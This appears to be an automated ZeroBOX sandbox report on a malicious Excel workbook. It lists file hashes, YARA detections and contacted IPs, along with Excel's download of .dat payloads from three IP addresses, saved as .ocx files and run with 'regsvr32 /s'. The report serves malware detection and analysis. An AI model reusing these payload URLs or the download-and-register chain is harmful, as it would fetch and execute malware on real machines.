Summary | ZeroBOX

SNC-66168115-Apr-6.xlsb

Malicious Library Excel Binary Workbook file format(xlsb)
Category FILE
Machine s1_win7_x6402
Started April 7, 2022, 5:29 p.m.
Completed April 7, 2022, 5:32 p.m.
Size 1.2MB
Type Microsoft Excel 2007+
MD5 a0e3a2e0777164a03e52cfd9978113af
SHA256 3b3bdd8384db003a3b4f702b9aeb6c20db506bed7f3d3539ea5a22a6d1ba4f6f
CRC32 FF201740
ssdeep 24576:GF+BnmJkeGC2PbA/HMoNYIPeuVe2HHCkm6CyIwl6hafINeWHWR72vF+BnmJkeGC9:6ymaeGC9YSeQHCkXC/wl6LcW2929ymaW
Yara
  • xlsb - Excel Binary Workbook file format detection
  • Malicious_Library_Zero - Malicious_Library

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
104.225.129.111 Active Moloch
164.124.101.2 Active Moloch
212.46.38.179 Active Moloch
91.234.254.131 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

suspicious_features Connection to IP address
suspicious_request GET http://212.46.38.179/7790983516.dat

suspicious_features Connection to IP address
suspicious_request GET http://91.234.254.131/7790983516.dat
request GET http://212.46.38.179/7790983516.dat
request GET http://91.234.254.131/7790983516.dat
file C:\ProgramData\Frister.ocx
file C:\ProgramData\Frister1.ocx
file C:\ProgramData\Frister2.ocx
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003f0
filepath: C:\Users\test22\AppData\Local\Temp\~$SNC-66168115-Apr-6.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$SNC-66168115-Apr-6.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline regsvr32 /s C:\ProgramData\Frister.ocx
cmdline regsvr32 /s C:\ProgramData\Frister2.ocx
cmdline regsvr32 /s C:\ProgramData\Frister1.ocx
host 104.225.129.111
host 212.46.38.179
host 91.234.254.131
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: http://104.225.129.111/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister.ocx
filepath: C:\ProgramData\Frister.ocx
2148270085 0

URLDownloadToFileW

url: http://212.46.38.179/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister1.ocx
filepath: C:\ProgramData\Frister1.ocx
2148270088 0

URLDownloadToFileW

url: http://91.234.254.131/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister2.ocx
filepath: C:\ProgramData\Frister2.ocx
2148270088 0
parent_process excel.exe
martian_process regsvr32 /s C:\ProgramData\Frister.ocx

parent_process excel.exe
martian_process regsvr32 /s C:\ProgramData\Frister2.ocx

parent_process excel.exe
martian_process regsvr32 /s C:\ProgramData\Frister1.ocx
dead_host 104.225.129.111:80